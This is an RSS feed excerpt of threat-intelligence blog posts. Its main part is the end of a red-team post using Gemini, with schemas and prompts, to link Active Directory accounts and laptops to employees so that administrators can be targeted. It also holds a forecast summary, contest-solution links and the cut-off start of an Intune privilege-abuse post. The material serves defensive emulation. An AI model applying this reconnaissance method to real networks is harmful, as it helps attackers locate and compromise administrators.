For defenders, legacy user accounts or administrators with too many rights are a common security issue.</span></p> <p><span style="vertical-align: baseline;">Administrators often have multiple user accounts: one for normal operations such as reading email and working on their workstation, and one or more administrator accounts. This separation is done to make it harder for attackers to compromise the administrator account.</span></p> <p><span style="vertical-align: baseline;">There are some common flaws in how this separation is implemented that sometimes make it possible to bypass it. Most of the methods require the attacker to cluster the users together to see which accounts belong to the same employee. In many cases, this can be done by inspecting the Active Directory objects and searching for patterns in the display name, description, or other fields. To automate this, we tried to find these patterns with Gemini.</span></p> <h4><span style="vertical-align: baseline;">Data Model</span></h4> <p><span style="vertical-align: baseline;">For this use case, we would like to have the names of the accounts that Gemini clusters together. During initial testing, the results were quite random. However, after adding a "reason" field, the results improved dramatically. 
So we used the following Pydantic model:</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>from pydantic import BaseModel, Field


# Account is referenced below but not defined in this excerpt of the post.
# This minimal placeholder is an assumption (not the authors' code) so the
# module can be imported as-is.
class Account(BaseModel):
    name: str = Field(description="Name of the account")


class User(BaseModel):
    # One employee, with all accounts the model believes belong to them.
    accounts: list[Account] = Field(
        description="accounts that probably belongs to this user", default=[]
    )
    reason: str = Field(
        description="Reason why these accounts belong to this user", default=""
    )


class UserAccountResults(BaseModel):
    # Container for the structured response: only users with multiple accounts.
    users: list[User] = Field(description="users with multiple accounts", default=[])</code></pre></div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">Prompt</span></h4> <p><span style="vertical-align: baseline;">In the prompt, we give some examples of what kind of systems we are looking for:</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>Given the data, cluster the accounts that belong to a single person by checking for similarities in the name, displayname and sam. Only include results that are likely to be the same user. Only include results when there is a user with multiple accounts. It is possible that a user has more than two accounts. Please specify a reason why those accounts belong to the same user. Use the first (name) field to identify the accounts.</code></pre></div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">Results</span></h4> <p><span style="vertical-align: baseline;">The test dataset had about 900 users. We manually determined that some users have two to four accounts with various permissions. Some of these accounts followed the same pattern, such as "user@test.local" and "adm-user@test.local." However, other accounts had patterns where the admin account was based on the first couple of letters. For example, their main account had the pattern matthijs.gielen@test.local, and the admin account was named: adm-magi@test.local. To keep track of those accounts, the description of the admin account contained some text similar to "admin account of Matthijs Gielen." 
</span></p> <p><span style="vertical-align: baseline;">With this prompt, Gemini managed to cluster 50 groups of accounts in our dataset. After manual verification, some of the results were discarded because they only contained one account in the cluster. This resulted in 43 correct clusters of accounts. Manually, we found the same correlation; however, where Gemini managed to output this information in a couple of minutes, manually this took quite a bit longer to analyze and correlate all accounts. This information was used in preparation for further attacks, as shown in the next use case.</span></p> <h3><span style="vertical-align: baseline;">Use Case 5: Correlation Between Users and Their Machines</span></h3> <p><span style="vertical-align: baseline;">Knowing which users to target or defend is often not enough. We also need to find them within the network in order to compromise them. Domain administrators are (usually) physical people; they need somewhere to type in their commands and perform administrative actions. This means that we need to correlate which domain administrator is working from which workstation. This is called session information, and BloodHound uses this information in an edge called "HasSession."</span></p> <p><span style="vertical-align: baseline;">In the past, it was possible to get all session information with a regular user during red teaming.</span></p> <p><span style="vertical-align: baseline;">Using the technique in Use Case 4, we can correlate the different user accounts that one employee may have. The next step is to figure out which workstation belongs to that employee. Then we can target that workstation, and from there, hopefully recover the passwords of their administrator accounts.</span></p> <p><span style="vertical-align: baseline;">In this case, employees have corporate laptops, and the company needs to keep track of which laptop belongs to which employee. 
Often this information is stored in one of the fields of the computer object in the Active Directory. However, there are many ways to do this, and using Gemini to parse the unstructured data is one such example.</span></p> <h4><span style="vertical-align: baseline;">Data Model</span></h4> <p><span style="vertical-align: baseline;">This model is quite simple: we just want to correlate machines to their users and have Gemini give a reason why, which improves the model's output. Because we will send all users and all computers at once, we will need a list of results.</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>from pydantic import BaseModel, Field


class UserComputerCorrelation(BaseModel):
    # One (user, computer) pair the model believes belong together.
    user: str = Field(description="name of the user")
    computer: str = Field(description="name of the computer")
    reason: str = Field(
        description="Reason why these accounts belong to this user", default=""
    )


class CorrelationResults(BaseModel):
    # Container for the structured response: all correlated pairs.
    results: list[UserComputerCorrelation] = Field(
        description="users and computers that correlate", default=[]
    )</code></pre></div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">Prompt</span></h4> <p><span style="vertical-align: baseline;">In the prompt, we give some examples of what kind of systems we are looking for:</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>Given the two data sets, find the computer that correlates to a user by checking for similarities in the name, displayname and sam. Only include results that are likely to correspond. Please specify a reason why that user and computer correlates. Use the first (name) field to identify the users and computers.</code></pre></div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">Results</span></h4> <p><span style="vertical-align: baseline;">The dataset used contains around 900 users and 400 computers. 
During the assignment, we determined that the administrators correlated users and their machines via the description field of the computer, which was roughly the same as the user's display name. Gemini picked up this connection, correctly correlating around 120 users to their respective laptops (Figure 3).</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/ai-adversarial-emulation-fig3a.max-1000x1000.png" alt="Connections between user and laptop as correlated by Gemini"> </a> <figcaption class="article-image__caption "><p data-block-key="lift0">Figure 3: Connections between user and laptop as correlated by Gemini</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Gemini helped us select an appropriate workstation, which enabled us to perform lateral movement to that workstation and obtain the password of an administrator, getting us closer to our goal.</span></p> <p><span style="vertical-align: baseline;">To defend against these threats, it can be valuable to run tools like BloodHound in the network. As discussed, BloodHound might not find all the "hidden" edges in your network, but you can add these yourself to the graph. This will allow you to find more Active Directory-based attack paths that are possible in your network and mitigate them before an attacker has an opportunity to exploit them.</span></p> <h2><span style="vertical-align: baseline;">Conclusion</span></h2> <p><span style="vertical-align: baseline;">In this blog post, we looked at processing red team data using LLMs to aid in adversarial emulation or improving defenses. These use cases were related to processing human-generated, unstructured data. 
Table 3 summarizes the results.</span></p></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table border="1px" cellpadding="16px" style="border-collapse: collapse; margin-left: auto; margin-right: auto;"><colgroup><col/><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><strong style="vertical-align: baseline;">Use Case</strong></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><strong style="vertical-align: baseline;">Accuracy of the Results</strong></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><strong style="vertical-align: baseline;">Usefulness</strong></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Roles</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: 
baseline;">High</strong><span style="vertical-align: baseline;">: There were a few false positives that were in the gray area.</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">High</strong><span style="vertical-align: baseline;">: Especially when going through a large list of roles of users, this approach will provide fairly fast results.</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Credentials in files</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">High</strong><span style="vertical-align: baseline;">: Found more credentials than comparable tools. More testing should look into the false-positive rate in real scenarios.</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Medium</strong><span style="vertical-align: baseline;">: This approach finds a lot more results; however, processing it with Gemini is a lot slower (five seconds per file) than many other alternatives.</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">High-value targets</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Medium</strong><span style="vertical-align: baseline;">: Not all results were new, nor were all high-value targets.</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Medium</strong><span style="vertical-align: baseline;">: Some of the results were useful; however, all of them still require manual verification.</span></p> </td> </tr> <tr> <td 
style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Account clustering</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">High</strong><span style="vertical-align: baseline;">: After discarding the clusters with only one account, the remaining ones were well clustered.</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">High</strong><span style="vertical-align: baseline;">: Clustering users manually is usually a tedious process. This approach gives fairly reliable results if you filter out the results with only one account.</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Computer correlation</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">High</strong><span style="vertical-align: baseline;">: All results correctly correlated users to their computers.</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">High</strong><span style="vertical-align: baseline;">: This approach produces accurate results, potentially providing insights into additional attack paths.</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <p style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Table 3: The results of our experiments of data processing with Gemini</span></p> </div></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">As the results show, using an LLM like 
Gemini can help in converting this type of data into structured data to aid attackers and defenders. However, keep in mind that LLMs are not a silver bullet and have limitations. For example, they can sometimes produce false positives or be slow to process large amounts of data.</span></p> <p><span style="vertical-align: baseline;">There are quite a few use cases we have not covered in this blog post. Some other examples where you can use this approach are:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Correlating user groups to administrator privileges on workstations and servers</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Summarizing internal website content or documentation to search for target systems</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Ingesting documentation to generate password candidates for cracking passwords</span></p> </li> </ul> <h2><span style="vertical-align: baseline;">The Future</span></h2> <p><span style="vertical-align: baseline;">This was just an initial step that we on the Advanced Capabilities team on the Mandiant Red Team have explored so far when using LLMs for adversarial emulation and defense. For next steps, we know that the models and prompts can be improved by testing variations in the prompts, and other data sources can be investigated to see if Gemini can help analyze them. 
We are also looking at using linear regression models as well as clustering and pathfinding algorithms to enable cybersecurity practitioners to quickly evaluate attack paths that may exist in a network.</span></p></div></description><pubDate>Thu, 14 Nov 2024 14:00:00 +0000</pubDate><guid>https://cloud.google.com/blog/topics/threat-intelligence/ai-enhancing-your-adversarial-emulation/</guid><category>Threat Intelligence</category><og xmlns:og="http://ogp.me/ns#"><type>article</type><title>Pirates in the Data Sea: AI Enhancing Your Adversarial Emulation</title><description></description><site_name>Google</site_name><url>https://cloud.google.com/blog/topics/threat-intelligence/ai-enhancing-your-adversarial-emulation/</url></og><author xmlns:author="http://www.w3.org/2005/Atom"><name>Mandiant </name><title></title><department></department><company></company></author></item><item><title>Emerging Threats: Cybersecurity Forecast 2025</title><link>https://cloud.google.com/blog/topics/threat-intelligence/cybersecurity-forecast-2025/</link><description><div class="block-paragraph_advanced"><p>Every November, we start sharing forward-looking insights on threats and other cybersecurity topics to help organizations and defenders prepare for the year ahead. The Cybersecurity Forecast 2025 report, available today, plays a big role in helping us accomplish this mission.</p> <p>This year’s report draws on insights directly from Google Cloud's security leaders, as well as dozens of analysts, researchers, responders, reverse engineers, and other experts on the frontlines of the latest and largest attacks. 
</p></div> <div class="block-paragraph_advanced"><h2><span style="vertical-align: baseline;">Key Threat Findings</span></h2> <p><span style="vertical-align: baseline;">Built on trends we are already seeing today, the Cybersecurity Forecast 2025 report provides a realistic outlook of what organizations can expect to face in the coming year. The report covers a lot of topics across all of cybersecurity, with a focus on various threats such as:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Attacker Use of Artificial Intelligence (AI):</strong><span style="vertical-align: baseline;"> Threat actors will increasingly use AI for sophisticated phishing, vishing, and social engineering attacks. 
They will also leverage deepfakes for identity theft, fraud, and bypassing security measures.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">AI for Information Operations (IO):</strong><span style="vertical-align: baseline;"> IO actors will use AI to scale content creation, produce more persuasive content, and enhance inauthentic personas.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">The Big Four:</strong><span style="vertical-align: baseline;"> Russia, China, Iran, and North Korea will remain active, engaging in espionage operations, cyber crime, and information operations aligned with their geopolitical interests.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Ransomware and Multifaceted Extortion:</strong><span style="vertical-align: baseline;"> Ransomware and multifaceted extortion will continue to be the most disruptive form of cyber crime, impacting various sectors and countries.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Infostealer Malware:</strong><span style="vertical-align: baseline;"> Infostealer malware will continue to be a major threat, enabling data breaches and account compromises.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Democratization of Cyber Capabilities:</strong><span style="vertical-align: baseline;"> Increased access to tools and services will lower barriers to entry for less-skilled actors.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: 
baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Compromised Identities:</strong><span style="vertical-align: baseline;"> Compromised identities in hybrid environments will pose significant risks.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Web3 and Crypto Heists:</strong><span style="vertical-align: baseline;"> Web3 and cryptocurrency organizations will increasingly be targeted by attackers seeking to steal digital assets.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Faster Exploitation and More Vendors Targeted:</strong><span style="vertical-align: baseline;"> The time to exploit vulnerabilities will continue to decrease, and the range of targeted vendors will expand.</span></p> </li> </ul> <h2><span style="vertical-align: baseline;">Be Prepared for 2025</span></h2> <p><span style="vertical-align: baseline;">Read the <a href="https://cloud.google.com/security/resources/cybersecurity-forecast?utm_source=cgc-blog&amp;utm_medium=blog&amp;utm_campaign=FY24-Q4-global-MAND1370-website-dl-dgcsm-security-forecast-2025&amp;utm_content=cgc-blog&amp;utm_term=-">Cybersecurity Forecast 2025</a> report for a more in-depth look at these and other threats, as well as other security topics such as post-quantum cryptography, and insights unique to the JAPAC and EMEA regions. 
</span></p> <p><span style="vertical-align: baseline;">For an even deeper look at the threat landscape next year, register for our </span><a href="https://www.brighttalk.com/webcast/7451/629092" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Cybersecurity Forecast 2025 webinar</span></a><span style="vertical-align: baseline;">, which will be hosted once again by threat expert Andrew Kopcienski.</span></p> <p><span style="vertical-align: baseline;">For even more insights, hear directly from our <a href="https://www.youtube.com/playlist?list=PLjiTz6DAEpuKpOI-pJmJkoqdyqj6B1DXK" rel="noopener" target="_blank">security leaders</a>: Charles Carmakal, Sandra Joyce, Sunil Potti, and Phil Venables.</span></p></div></description><pubDate>Wed, 13 Nov 2024 14:00:00 +0000</pubDate><guid>https://cloud.google.com/blog/topics/threat-intelligence/cybersecurity-forecast-2025/</guid><category>Threat Intelligence</category><og xmlns:og="http://ogp.me/ns#"><type>article</type><title>Emerging Threats: Cybersecurity Forecast 2025</title><description></description><site_name>Google</site_name><url>https://cloud.google.com/blog/topics/threat-intelligence/cybersecurity-forecast-2025/</url></og><author xmlns:author="http://www.w3.org/2005/Atom"><name>Adam Greenberg</name><title>Content Marketing Manager, Mandiant</title><department></department><company></company></author></item><item><title>Flare-On 11 Challenge Solutions</title><link>https://cloud.google.com/blog/topics/threat-intelligence/flareon-11-challenge-solutions/</link><description><div class="block-paragraph_advanced"><p>Written by: Nick Harbour</p> <hr/></div> <div class="block-paragraph_with_image"><div class="article-module h-c-page"> <div class="h-c-grid uni-paragraph-wrap"> <div class="uni-paragraph h-c-grid__col h-c-grid__col--8 h-c-grid__col-m--6 h-c-grid__col-l--6 h-c-grid__col--offset-2 h-c-grid__col-m--offset-3 h-c-grid__col-l--offset-3"> <figure 
class="article-image--wrap-small " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/flare-on11-medal.max-1000x1000.png" alt="Flare-On 11 medal"> </figure> <p data-block-key="2xct5">The eleventh Flare-On challenge is now over! This year proved to be a tough challenge for the over 5,300 players, with only 275 completing all 10 stages. We had a blast making this contest and are happy to see it continue to be a world-wide phenomenon. Those who finished all stages this year may be eligible to receive this elite desk trophy, to the envy of their coworkers and family.</p> </div> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">We would like to thank the challenge authors individually for their great puzzles and solutions:</span></p> <ol> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">frog - Nick Harbour (@nickharbour)</span></p> </li> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">checksum - Chuong Dong (@cPeterr)</span></p> </li> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">aray - Jakub Jozwiak</span></p> </li> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">FLARE Meme Maker 3000 - Moritz Raabe (@m_r_tz)</span></p> </li> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">sshd - Christopher Gardner (@t00manybananas)</span></p> </li> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">bloke2 - Dave Riley (@6502_ftw)</span></p> </li> <li 
aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">fullspeed - Sam Kim</span></p> </li> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Clearly Fake - Blas Kojusner (@bkojusner)</span></p> </li> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">serpentine - Mustafa Nasser (@d35ha)</span></p> </li> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">CATBERT Ransomware - Mark Lechtik (@_marklech_)</span></p> </li> </ol> <p><span style="vertical-align: baseline;">This year’s challenge hosted 5,324 registered users, with 3,066 of them solving at least one stage. The difficulty curve ended up smoother than last year’s, with a nice progression of people falling off at stages 5, 7, and 9. Coincidentally, based on finisher feedback, those were also the consensus favorite challenges this year. Does that mean we should up the difficulty next time?</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/flare-on11-solves.max-1000x1000.png" alt="Flare-On 11 solves"> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Last year Germany was far out ahead of the leaderboard with 19 finishers to 2nd place Singapore’s 15. 
This year Vietnam takes the lead with 21 finishers and the USA comes in second with 20.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/flare-on11-finishers.max-1000x1000.png" alt="Flare-On 11 finishers"> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">All the binaries from this year’s challenge are now posted on the </span><a href="http://flare-on.com/files/Flare-On11_Challenges.zip" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Flare-On website</span></a><span style="vertical-align: baseline;">. Here are the solutions written by each challenge author:</span></p> <ol> <li><a href="https://services.google.com/fh/files/misc/flare-on11-challenge1-frog.pdf" rel="noopener" target="_blank">SOLUTION #1</a></li> <li><a href="https://services.google.com/fh/files/misc/flare-on11-challenge2-checksum.pdf" rel="noopener" target="_blank">SOLUTION #2</a></li> <li><a href="https://services.google.com/fh/files/misc/flare-on11-challenge3-aray.pdf" rel="noopener" target="_blank">SOLUTION #3</a></li> <li><a href="https://services.google.com/fh/files/misc/flare-on11-challenge4-flare-meme-maker-3000.pdf" rel="noopener" target="_blank">SOLUTION #4</a></li> <li><a href="https://services.google.com/fh/files/misc/flare-on11-challenge5-sshd.pdf" rel="noopener" target="_blank">SOLUTION #5</a></li> <li><a href="https://services.google.com/fh/files/misc/flare-on11-challenge6-bloke2.pdf" rel="noopener" target="_blank">SOLUTION #6</a></li> <li><a href="https://services.google.com/fh/files/misc/flare-on11-challenge7-fullspeed.pdf" rel="noopener" target="_blank">SOLUTION #7</a></li> <li><a 
href="https://services.google.com/fh/files/misc/flare-on11-challenge8-clearly-fake.pdf" rel="noopener" target="_blank">SOLUTION #8</a></li> <li><a href="https://services.google.com/fh/files/misc/flare-on11-challenge9-serpentine.pdf" rel="noopener" target="_blank">SOLUTION #9</a></li> <li><a href="https://services.google.com/fh/files/misc/flare-on11-challenge10-catbert-ransomware.pdf" rel="noopener" target="_blank">SOLUTION #10</a></li> </ol></div></description><pubDate>Fri, 08 Nov 2024 20:00:00 +0000</pubDate><guid>https://cloud.google.com/blog/topics/threat-intelligence/flareon-11-challenge-solutions/</guid><category>Threat Intelligence</category><og xmlns:og="http://ogp.me/ns#"><type>article</type><title>Flare-On 11 Challenge Solutions</title><description></description><site_name>Google</site_name><url>https://cloud.google.com/blog/topics/threat-intelligence/flareon-11-challenge-solutions/</url></og><author xmlns:author="http://www.w3.org/2005/Atom"><name>Mandiant </name><title></title><department></department><company></company></author></item><item><title>(In)tuned to Takeovers: Abusing Intune Permissions for Lateral Movement and Privilege Escalation in Entra ID Native Environments</title><link>https://cloud.google.com/blog/topics/threat-intelligence/abusing-intune-permissions-entra-id-environments/</link><description><div class="block-paragraph_advanced"><p>Written by: Thibault Van Geluwe de Berlaere, Karl Madden, Corné de Jong</p> <hr/></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">The Mandiant Red Team recently supported a client to visualize the possible impact of a compromise by an advanced threat actor. During the assessment, Mandiant moved laterally from the customer’s on-premises environment to their Microsoft Entra ID tenant and obtained privileges to compromise existing Entra ID service principals installed in the tenant. 
</span></p> <p><span style="vertical-align: baseline;">In this blog post, we will show a novel way in which adversaries can move laterally and elevate privileges within Microsoft Entra ID, when organizations use a popular security architecture involving Intune-managed Privileged Access Workstations (PAWs), by abusing Intune permissions (</span><span style="font-style: italic; vertical-align: baseline;">DeviceManagementConfiguration.ReadWrite.All</span><span style="vertical-align: baseline;">) granted to Entra ID service principals. We also provide remediation steps and recommendations to prevent and detect this type of attack.</span></p> <h2><span style="vertical-align: baseline;">Pretext</span></h2> <p><span style="vertical-align: baseline;">The customer had a mature security architecture following Microsoft’s recommended </span><a href="https://aka.ms/AccessModel" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Enterprise Access</span></a><span style="vertical-align: baseline;"> model, including:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">An on-premises environment using Active Directory, following the </span><a href="https://aka.ms/ESAE#best-practice-for-securing-on-premises-ad" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Tiered Model</span></a><span style="vertical-align: baseline;">. </span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">An Entra ID environment, synced to the on-premises environment using Microsoft Entra Connect Sync to synchronize on-premises identities and groups to Entra ID. 
This environment was administered using PAWs, which were not joined to the on-premises Active Directory environment, but instead were fully cloud-native and managed by Intune Mobile Device Management (MDM). IT administrators used a dedicated, cloud-native (non-synced) administrative account to log in to these systems. Entra ID role assignments (</span><span style="font-style: italic; vertical-align: baseline;">Global Administrator</span><span style="vertical-align: baseline;">, </span><span style="font-style: italic; vertical-align: baseline;">Privileged Role Administrator</span><span style="vertical-align: baseline;">, etc.) were exclusively assigned to these cloud-native administrative accounts.</span></p> </li> </ul> <p><span style="vertical-align: baseline;">The separation of administrative accounts, devices and privileges between the on-premises environment and the Entra ID environment provided a strong security boundary:</span></p> <ol> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Using separate, cloud-native identities for Entra ID privileged roles ensures that a compromise of the on-premises Active Directory cannot be used to compromise the Entra ID environment. This is a </span><a href="https://learn.microsoft.com/en-us/entra/identity/role-based-access-control/best-practices#9-use-cloud-native-accounts-for-microsoft-entra-roles" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Microsoft best practice</span></a><span style="vertical-align: baseline;">.</span></p> </li> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Using separate physical workstations for administrative access to on-premises resources and cloud resources effectively creates an ‘air gap’ between the administration plane of the two environments. 
Air gaps are especially difficult for attackers to cross.</span></p> </li> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">The administrative accounts in Entra ID were assigned roles through Privileged Identity Management enforced by strong Conditional Access policies, requiring a managed, compliant device and multi-factor authentication. These are also Microsoft-recommended </span><a href="https://learn.microsoft.com/en-us/entra/identity/role-based-access-control/best-practices#2-use-privileged-identity-management-to-grant-just-in-time-access" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">best</span></a><span style="vertical-align: baseline;"> </span><a href="https://learn.microsoft.com/en-us/entra/identity/role-based-access-control/best-practices#3-turn-on-multi-factor-authentication-for-all-your-administrator-accounts" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">practices</span></a><span style="vertical-align: baseline;">.</span></p> </li> </ol> <h2><span style="vertical-align: baseline;">Attack Path</span></h2> <p><span style="vertical-align: baseline;">As part of the assessment objectives, the Mandiant Red Team was tasked with obtaining </span><span style="font-style: italic; vertical-align: baseline;">Global Administrator</span><span style="vertical-align: baseline;"> privileges in the Entra ID tenant. 
Through various techniques out of scope for this blog post, Mandiant obtained privileges in the Entra ID tenant to add credentials to Entra ID service principals (</span><span style="font-style: italic; vertical-align: baseline;">microsoft.directory/servicePrincipals/credentials/update</span><span style="vertical-align: baseline;">), allowing the Red Team to compromise any preinstalled service principal.</span></p> <p><span style="vertical-align: baseline;">A few publicly <a href="https://www.secura.com/blog/compromising-azure-cloud-through-sensitive-api-permissions" rel="noopener" target="_blank">known</a> <a href="https://cloudbrothers.info/en/prem-global-admin-password-reset/" rel="noopener" target="_blank">techniques</a></span><span style="vertical-align: baseline;"> exist to abuse service principal privileges to obtain elevated permissions, most notably using the </span><span style="font-style: italic; vertical-align: baseline;">RoleManagement.ReadWrite.Directory</span><span style="vertical-align: baseline;">, </span><span style="font-style: italic; vertical-align: baseline;">AppRoleAssignment.ReadWrite.All</span><span style="vertical-align: baseline;"> and </span><span style="font-style: italic; vertical-align: baseline;">Application.ReadWrite.All</span><span style="vertical-align: baseline;"> Microsoft Graph permissions. </span></p> <p><span style="vertical-align: baseline;">None of these permissions were in use in the customer’s environment though, forcing the Mandiant Red Team to rethink their strategy. 
